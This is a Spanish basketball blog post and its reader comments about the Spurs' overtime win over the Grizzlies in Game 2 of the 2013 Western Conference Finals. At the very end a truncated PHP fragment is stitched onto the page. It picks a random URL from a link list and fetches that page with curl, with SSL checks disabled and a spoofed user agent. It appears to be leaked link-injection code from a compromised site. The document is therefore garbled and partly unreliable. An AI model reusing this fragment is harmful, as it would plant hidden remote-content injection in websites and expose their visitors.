La Crónica: Tan cerca, tan lejos

22 de May de 2013 por MagicJohnson32

Parker Manu

No fue bonito, ya nos había advertido Tim Duncan que no lo sería, y los Spurs nos dejaron un 4º cuarto horroroso, pero aun así San Antonio se situó 2-0 en las finales del Oeste tras vencer anoche nuevamente a Memphis Grizzlies, que remontaron 18 puntos y forzaron la prórroga pero se ahogaron en la orilla (89-93).

Durante tres cuartos, Spurs y Grizzlies siguieron el guion del encuentro inaugural de la serie: los texanos, muy superiores bajo la sensacional dirección de Tony Parker, quien en este tiempo apuntó al récord de asistencias de los Playoffs en manos de Magic y Stockton (24); los Grizzlies, de nuevo aturados frente a la defensa local, que niega cualquier espacio a Gasol y Randolph a sabiendas de los problemas que tienen los Grizzlies para anotar desde fuera.

Y así, con Parker coleccionando asistencias y Memphis reduciendo sus porcentajes de acierto a cotas ínfimas, los Spurs se hicieron con el mando del partido. Resultó crucial para ello un 0-13 en los minutos anteriores al descanso que disparó la renta de San Antonio a 16 puntos (30-46). Superado el intermedio, Los Grizzlies lograron, en primer lugar, cerrar la hemorragia y empezaron a anotar con cierta solvencia. El tercer cuarto consistió en un intercambio de canastas en el que los Spurs alcanzaron la máxima ventaja del partido (54-72) pero que sirvió al conjunto dirigido por Hollins para recuperar la confianza de cara a la embestida final.

La anotación de Bayless, la lucha de Randolph bajo el aro de los Spurs y los rebotes ofensivos fueron lo que dio esperanzas a los Grizzlies, aunque para completar la remontada hizo falta un último cuarto calamitoso de los Spurs, que evidenciaron el agotamiento y cometieron errores impropios. En concreto uno de Ginóbili le costó la prórroga: después de recortar la diferencia a 5 (78-83) y con cinco minutos todavía por jugarse, Memphis falló sus siguientes siete lanzamientos mientras los Spurs sólo anotaban uno. A 0:52 para el final, un 2+1 de Randolph puso el 81-85 y en la siguiente jugada, Ginóbili perdió el balón y cometió una falta flagrante sobre Tony Allen (quien, por otra parte, exageró la caída y fingió haberse golpeado la cabeza, lo que le debería comportar un aviso por flopping) que se tradujo en 4 puntos después de que Allen convirtiese los tiros libres y Conley anotase una magnífica canasta a mano cambiada. El intento forzado de Duncan sobre la bocina no entró y se llegó al tiempo extra.

¿Y qué hacer cuando te atascas, te entran las dudas y ves cómo te remontan 18 puntos para llevarte hasta la prórroga? Es fácil: se la das a Tim Duncan. El ala-pívot anotó tres canastas y jugó su habitual defensa estelar para sellar la victoria de los Spurs. Sufrida, sí; fea, desde luego; pero victoria al fin y al cabo. El 2-0 con el que la serie viaja a Memphis consolida la condición de favoritos de San Antonio, pero la forma en que se produjo nos recuerda que los Grizzlies van a seguir en pie hasta el último momento.

duncanPREMIOS

MVP: Tony Parker comandó la ofensiva de los Spurs con 18 asistencias, a sólo 2 del récord del récord de la franquicia en un partido de Playoffs. Cuando el torrente creativo del base francés se secó, ahí estaba Tim Duncan, fundamental en la prórroga, en la que anotó los primeros 6 puntos y abrió el hueco definitivo para que su equipo se llevara la victoria.

Sorpresa: Quincy Pondexter y Jarryd Bayless son más importantes en el juego de los Grizzlies de lo que se podría pensar en un principio. Ayer, Pondexter jugó 37 minutos en detrimento de Prince y Jarryd Bayless fue el máximo anotador de su equipo con 18 puntos.

Decepción: Tony Allen no tuvo su día. Encestó sólo 2 de los 11 lanzamientos que intentó. Conociendo sus virtudes y defectos tal debería haberse cortado un poco, especialmente en un triple en la prórroga que pasó a medio metro del aro y para el que todavía no encontramos explicación.

Esfuerzo en vano: Marc Gasol y Zach Randolph fueron los mejores de los Grizzlies pero no estuvieron muy inspirados de cara a canasta. El primero acabó con 12 puntos, 14 rebotes, 4 asistencias y 2 tapones pero con un 4 de 12 en tiros de campo y sin anotar en los últimos 17 minutos de partido. El segundo, con 15 puntos, 18 rebotes, 3 asistencias y 2 tapones, pero con un 6 de 18.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Nacho dice:
    #1

    Estoy con un trancazo infame y no duermo.Me pongo a ver el partido y no sé si lo veo… jjejejeje.
    Ayer pillé la segunda parte.. Hubo momentos que parecía que SA rompían definitivamente el partido, pero un arreón final de los ositos los dejaron (creo que a 16-18) pero con buenas sensaciones. El inicio de 4º cuarto parecí que igualaba el partido, pero dos cagadas grizzlies y Parker, dejaron el marcador en 83-70. mi fiebre me dijo que me acosara, eso estaba resuelto. Me acosté y he flipado esta mañana con el cortocircuito Spurs.
    Dos puntos en 7/8 minutos… Brutal. Parece ser que Randolph apareció y Marc se disolvió en ataque, igual por eso no ganaron.
    Lo de Allen es flagrante brutal, Manu le engancha el brazo y tira hacia abajo con una fuerza descomunal. No se llega a ver en las imágenes, pero parece que Allen se da en la cara en la caída, no creo que sea flopping.
    Menphis tiene que imponer su ritmo en casa si quiere darle la vuelta a la eliminatoria.
    Todo es posible….

      Citar

  2. Sancho88 dice:
    #2

    Se va apagando la llama de esperanza para estos Grizzlies, con lo que nos molaban a todos… en fin, putos Spurs, con perdón. Son muy buenos pero ya cansan. Yo creo que no hay ningún equipo en la NBA como los Spurs que den tanto asco porque siempre ganan o llegan a finales y tal… siempre lo mismo. Sí, hay que apreciarlo y todo el royo, pero ver a Parker, Manu y Duncan aburre ya. Todos los años lo mismo, jejej. No sé si a vosotros os pasa lo mismo o por el contrario, adoráis a estos Spurs… joder, pues que os den por culo si es así. Son más aburridos que un domingo en casa de los abuelos

      Citar

  3. GreenPride dice:
    #3

    Pues remar para morir en la orilla….
    Como bien dice la gran crónica de Magic durante 2 cuartos (el primero fue calamitoso por ambas partes) la sensación de superioridad de los Spurs fue total. Parker hizo y deshizo nuevamente apoyado además por los problemas de faltas de Conley que le mantuvieron fuera del partido mucho tiempo y los Spurs mantuvieron su acierto exterior que tan buenos resultados le había dado en el primer partido. Con los triples entrando y la fluidez de los Spurs en ataque a buen ritmo Memphis hacía lo que podía con un Zach de nuevo bajo mínimos.
    Y tras un tercer cuarto en el que al menos los Grizzlies empezaron a anotar, llegó el apagón de los texanos en el último cuarto. 2 puntos en los últimos 8 minutos, demasiada suerte tuvieron de que en ese periodo sólo hubo un 15-2 de parcial ya que Memphis se tiró los primeros 4 minutos de esos ocho sin meter ni un punto. Al final prórroga con la sensación de que los Grizzlies habían desaprovechado la oportunidad de acabar con los Spurs a pesar de remontar y que los Spurs habían tirado el partido lastrados por el cansancio y las faltas de Duncan que les dejaron sin referencia interior en un momento en que los triples dejaron de entrar.
    Pero claro, llegados ahí lo más fácil es volver a confiar en tu hombre-franquicia y claro si este es Duncan la apuesta suele salir bien.
    Con Memphis de nuevo totalmente obtuso en ataque el bueno de Tim se sacó tres canastas que decidieron el partido.
    Para Memphis este partido ha abierto una puerta a la esperanza y puede haberles mostrado el camino. Necesitan que Marc&Zach se impongan más por dentro y jugar más minutos con exteriores que las metan (Bayless y Pondexter por Prince y Allen) y sobre todo necesitan para el ataque Spur como en los cuartos 1 y 4. Para ello, primordial la denfensa de los bloqueos a Parker y Ginobilli así como intentar cargar de faltas a Duncan. Los Spurs ahora están cómodos con esta ventaja pero no deben descuidarse pues en Memphis las cosas serán aún más difíciles para ellos y Memphis ya sabe lo que darle la vuelta a esta situación. Sin embargo mucho han de cambiar las cosas y seguir el camino del último cuarto de este partido para que los Spurs no pisen de nuevo las Finales

      Citar

  4. Laker1624 dice:
    #4

    Yo considero a estos Spurs el mejor equipo de la ultima década y uno de los mejores equipos de la historia. Es posible que su juego no sea muy vistoso, pero en mi opinión, cuando se trata de jugar a baloncesto, hay pocos que se les puedan comparar. En lo que se refiere a Tim Duncan, creo que no se puede decir nada que no se haya dicho ya. Al igual que considero a San Antonio el mejor equipo de la década pasada, también creo que Duncan es el mejor jugador de ese periodo y un Top 15/20 histórico.

      Citar

  5. Sancho88 dice:
    #5

    Que sí, si ya sabemos que son los mejores y Duncan el mejor PF de la historia, pero al lío. Tú te diviertes viéndoles jugar?? SIempre es lo mismo y aburrido. Si sí te diviertes, entonces supongo que viendo partidos de la euroliga te lo pasas de puta madre

      Citar

  6. Laker1624 dice:
    #6

    Ya he dicho que es posible que su juego no sea vistoso, pero a mi personalmente me gusta como juegan y no me cansan. Supongo que será una cuestión de gustos. También me gusta la euroliga y la sigo, no creo que porque en esta competición no se juegue el mejor basket del mundo quiera decir que jueguen mal o sea aburrido.

      Citar

  7. Denise dice:
    #7

    Yo tambien soy un “anti-Spurs” y en especial un anti Matt-Bonner. No obstante reconozco el merito que tienen. Eso sí dentro de lo mal que me caen, ésta versión del 2013 me caen mejor por jugadores que me molan como Leonard ó Green.
    Los Spurs de Bowen, Horry y Barry si que los odiaba.

      Citar

  8. Esteban dice:
    #8

    que hermosos ver a duncan dominando una prorroga de finald e conferencia a los 36 años, increible, que jugador, que pedazo de historia de la nba en la cancha,
    el otro dia decia que lebron se ha ganado un lugar en el 5 mejor de la historia

    margic- jordan- lebron- wilt- kareem

    o debo decir que dundan merece el puesto de ala pivot de ese equipo?

      Citar

  9. Esteban dice:
    #9

    Laker1624:
    Yo considero a estos Spurs el mejor equipo de la ultima década y uno de los mejores equipos de la historia. Es posible que su juego no sea muy vistoso, pero en mi opinión, cuando se trata de jugar a baloncesto, hay pocos que se les puedan comparar. En lo que se refiere a Tim Duncan, creo que no se puede decir nada que no se haya dicho ya. Al igual que considero a San Antonio el mejor equipo de la década pasada, también creo que Duncan es el mejor jugador de ese periodo y un Top 15/20 histórico.

    top 15/20 historico? dios, nombrame 15 jugadores mejores que duncan y te doy un premio chaval, duncan es un top 10, y si gana este titulo, hasta llegaria a un top 5

      Citar

  10. Jose Luis dice:
    #10

    A mí me aburren muchísimo. Y mira que prefiero en PO equipos como Pacers, Grizzlies o Bulls (por su defensa, no por la inoperancia en ataque por la falta de dos jugadores principales) que unos Warriors o Knicks… pero es que los Spurs son un peñazo, aburrido, el campo feo, las camisetas feas… puf.

      Citar

  11. Laker1624 dice:
    #11

    Esteban: top 15/20 historico? dios, nombrame 15 jugadores mejores que duncan y te doy un premio chaval, duncan es un top 10, y si gana este titulo, hasta llegaria a un top 5

    He dicho un Top 15/20 histórico porque lo he dicho a la ligera y tampoco me parece adecuado decir que es un Top 5/10 sin meditarlo bien antes. Tampoco me parece tan grave decir que es uno de los 15 mejores jugadores de la historia de una liga en la que han jugado Russell, Pettit, Cousy, Chamberlain, Baylor, West, Jabbar, Erving, Magic, Bird, Jordan, Olajuwon, Malone (ambos), O’neal, Bryant, etc…

      Citar

  12. MagicJohnson32 dice:
    #12

    Pues yo odio a los Spurs (como cualquier aficionado Laker que viviese las batallas desde finales de los 90) pero creo que en los últimos 2 años son uno de los equipos que mejor juega. No son espectaculares ni transmiten lo que otros como Warriors o Denver, pero su juego de pases es el mejor de la liga, y además de calle. Apenas juegan ISO, hacen el pick & roll como dios, y juegan un baloncesto ofensivo basado en la técnica y el colectivo. A veces se bloquean, como les pasó en el 4º cuarto de anoche, pero en muchos momentos es realmente hermoso. Muy a mi pesar, jeje.

      Citar

  13. MagicJohnson32 dice:
    #13

    Por cierto ¿qué me decís del ÉPICO salto entre dos protagonizado por Bonner y Zach Ranolph? xDDD

    Edito: aquí el gif de la acción http://assets.sbnation.com/assets/2659741/worstjumpballever2_medium.gif

      Citar

  14. kantonyo dice:
    #14

    MagicJohnson32:
    Por cierto ¿qué me decís del ÉPICO salto entre dos protagonizado por Bonner y Zach Ranolph? xDDD

    Edito: aquí el gif de la acción http://assets.sbnation.com/assets/2659741/worstjumpballever2_medium.gif

    Ese salto entre Bonner y Randoslph es una muestra del juego de ayer de los dos equipos, para mi fue un partido penoso, con muchísimos errores, un juego bastante embarullado con miles de palmeos en rebotes, tiros que no tocaron aro, perdidas de balón inexplicables…

    En el primer partido San Antonio fue superior, y ayer en el segundo cuarto dio imagen como en el primer partido.

    Pero creo que si Memphis se lo acaba creyendo puede ganar la serie. Sólo tienen que pedirle al sr. Allen que se dedique a defender y al sr. Bayless que no se vuelva loco por meter una canasta, que no da más de si, que bastante tiene con haber metido la anterior, como para que se piense que es Jordan…

    Lo dicho, deben atacar pausados, con posesiones largas y con paciencia. Y defender como locos en el perímetro que es dónde los Spurs están haciendo muchísimo daño. Esperemos que se les acabe la suerte desde los 3 puntos.

      Citar

  15. Jose Luis dice:
    #15

    MagicJohnson32:
    Por cierto ¿qué me decís del ÉPICO salto entre dos protagonizado por Bonner y Zach Ranolph? xDDD

    Edito: aquí el gif de la acción http://assets.sbnation.com/assets/2659741/worstjumpballever2_medium.gif

    Entonces… lo de tan cerca, tan lejos… ¿iba por este jumpball no? xD

      Citar

  16. MagicJohnson32 dice:
    #16

    Jose Luis: Entonces… lo de tan cerca, tan lejos… ¿iba por este jumpball no? xD

    Sastamente xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>